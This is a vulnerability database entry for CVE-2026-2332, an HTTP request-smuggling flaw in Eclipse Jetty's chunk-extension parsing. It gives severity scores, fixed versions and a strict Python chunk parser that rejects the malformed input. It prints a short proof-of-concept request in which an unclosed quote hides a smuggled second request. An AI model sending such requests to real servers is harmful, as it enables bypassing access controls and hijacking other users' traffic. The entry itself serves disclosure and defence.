cbcvebase.
CVE-2026-2332
published 2026-04-14

Priority: P354
CVSS 3.1: 9.1 (critical)
Vector: AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N
EPSS: 1.13% (62.3rd percentile)

In Eclipse Jetty, the HTTP/1.1 parser is vulnerable to request smuggling when chunk extensions are used, similar to the "funky chunks" techniques outlined here:
* https://w4ke.info/2025/06/18/funky-chunks.html
* https://w4ke.info/2025/10/29/funky-chunks-2.html

Jetty terminates chunk extension parsing at \r\n inside quoted strings instead of treating this as an error.


POST / HTTP/1.1
Host: localhost
Transfer-Encoding: chunked

1;ext="val
X
0

GET /smuggled HTTP/1.1
...


Note how the chunk extension never closes its double quote; because the parser still ends the chunk-size line at the CRLF, the bytes that follow are read as a second, smuggled request.
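The parsing rule the advisory describes, shown as an added example (this is not Jetty's code): a strict chunk-size-line parser following RFC 9112 section 7.1 that treats CR or LF inside a quoted chunk-extension value as a parse error rather than as the end of the line, so the request above is rejected instead of being split into two requests. The function names (parse_chunk_size_line, decode_chunked, classify) and the sample bodies are constructed for this example; the malformed body mirrors the advisory's request.

```python
"""Strict parser for HTTP/1.1 chunk-size lines (RFC 9112 section 7.1).

Added example, not Jetty code.  A quoted chunk-extension value must be
closed before the CRLF that ends the line: CR and LF are not qdtext, so
a line such as  1;ext="val\r\n  is a parse error, not a complete line.
"""
import re

TCHAR = re.compile(rb"[!#$%&'*+\-.^_`|~0-9A-Za-z]+")  # token characters
HEX = re.compile(rb"[0-9A-Fa-f]+")                     # chunk-size digits


class ChunkParseError(ValueError):
    """Raised on any deviation from the chunked-coding grammar."""


def _skip_bws(data: bytes, pos: int) -> int:
    """Skip optional SP / HTAB ("bad whitespace") around ';' and '='."""
    while data[pos:pos + 1] in (b" ", b"\t"):
        pos += 1
    return pos


def _parse_quoted_string(data: bytes, pos: int):
    """Parse a quoted-string starting at the opening DQUOTE at data[pos]."""
    if data[pos:pos + 1] != b'"':
        raise ChunkParseError("quoted-string must start with DQUOTE")
    pos += 1
    out = bytearray()
    while True:
        if pos >= len(data):
            raise ChunkParseError("unterminated quoted-string")
        c = data[pos]
        if c == 0x22:  # closing DQUOTE
            return out.decode("latin-1"), pos + 1
        if c == 0x5C:  # quoted-pair: backslash + (HTAB / SP / VCHAR / obs-text)
            pos += 1
            if pos >= len(data):
                raise ChunkParseError("dangling backslash in quoted-string")
            c = data[pos]
            if not (c in (0x09, 0x20) or 0x21 <= c <= 0x7E or c >= 0x80):
                raise ChunkParseError("invalid quoted-pair")
        elif not (c in (0x09, 0x20) or c == 0x21 or 0x23 <= c <= 0x5B
                  or 0x5D <= c <= 0x7E or c >= 0x80):
            # CR, LF and other controls are not qdtext: the line ended inside
            # the quotes.  Reject it instead of treating it as end-of-line.
            raise ChunkParseError("control byte 0x%02x inside quoted-string" % c)
        out.append(c)
        pos += 1


def parse_chunk_size_line(data: bytes, pos: int = 0):
    """Parse one chunk-size line; return (size, extensions, pos after CRLF)."""
    m = HEX.match(data, pos)
    if not m:
        raise ChunkParseError("chunk-size must start with hex digits")
    size = int(m.group(), 16)
    pos = _skip_bws(data, m.end())
    exts = []
    while data[pos:pos + 1] == b";":
        pos = _skip_bws(data, pos + 1)
        m = TCHAR.match(data, pos)
        if not m:
            raise ChunkParseError("chunk-ext-name must be a token")
        name = m.group().decode("ascii")
        pos = _skip_bws(data, m.end())
        value = None
        if data[pos:pos + 1] == b"=":
            pos = _skip_bws(data, pos + 1)
            if data[pos:pos + 1] == b'"':
                value, pos = _parse_quoted_string(data, pos)
            else:
                m = TCHAR.match(data, pos)
                if not m:
                    raise ChunkParseError("chunk-ext-val must be token or quoted-string")
                value = m.group().decode("ascii")
                pos = m.end()
        exts.append((name, value))
        pos = _skip_bws(data, pos)
    # Only a CRLF may end the line; a bare LF or any other byte is an error.
    if data[pos:pos + 2] != b"\r\n":
        raise ChunkParseError("chunk-size line must end with CRLF")
    return size, exts, pos + 2


def decode_chunked(data: bytes, pos: int = 0):
    """Decode a chunked body; return (body, pos after the empty trailer)."""
    body = bytearray()
    while True:
        size, _exts, pos = parse_chunk_size_line(data, pos)
        if size == 0:
            if data[pos:pos + 2] != b"\r\n":  # trailer fields not supported here
                raise ChunkParseError("expected empty trailer section")
            return bytes(body), pos + 2
        chunk = data[pos:pos + size]
        if len(chunk) != size:
            raise ChunkParseError("truncated chunk-data")
        body += chunk
        pos += size
        if data[pos:pos + 2] != b"\r\n":
            raise ChunkParseError("chunk-data must be followed by CRLF")
        pos += 2


# Constructed sample bodies: the first mirrors the advisory's request.
MALFORMED_BODY = b'1;ext="val\r\nX\r\n0\r\n\r\nGET /smuggled HTTP/1.1\r\n'
WELL_FORMED_BODY = b'1;ext="val"\r\nX\r\n0\r\n\r\n'


def classify(body: bytes) -> str:
    """Return 'ok:<decoded>' for a valid body, 'reject:<reason>' otherwise."""
    try:
        decoded, _ = decode_chunked(body)
        return "ok:" + decoded.decode("latin-1")
    except ChunkParseError as exc:
        return "reject:" + str(exc)


if __name__ == "__main__":
    print(classify(MALFORMED_BODY))    # reject:control byte 0x0d inside quoted-string
    print(classify(WELL_FORMED_BODY))  # ok:X
```

A parser built this way never consumes the smuggled bytes as a second request: the connection fails at the unterminated quote and the server can respond with 400 and close. The same check is useful at a proxy or in a detection rule, since a CR or LF between an opening double quote and the end of a chunk-size line is never legitimate traffic.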

Affected (10 ranges)

Vendor              Product        Version range         Fixed in
eclipse             jetty          >= 10.0.0 < 10.0.28   10.0.28
eclipse             jetty          >= 11.0.0 < 11.0.28   11.0.28
eclipse             jetty          >= 12.0.0 < 12.0.33   12.0.33
eclipse             jetty          >= 12.1.0 < 12.1.7    12.1.7
eclipse             jetty          >= 9.4.0 < 9.4.60     9.4.60
eclipse_foundation  eclipse_jetty  10.0.0 – 10.0.27
eclipse_foundation  eclipse_jetty  11.0.0 – 11.0.27
eclipse_foundation  eclipse_jetty  12.0.0 – 12.0.32
eclipse_foundation  eclipse_jetty  12.1.0 – 12.1.6
eclipse_foundation  eclipse_jetty  9.4.0 – 9.4.59

CVSS provenance

Source         Version  Score  Severity  Vector
nvd            v3.1     9.1    CRITICAL  CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N
vendor_redhat           7.4    HIGH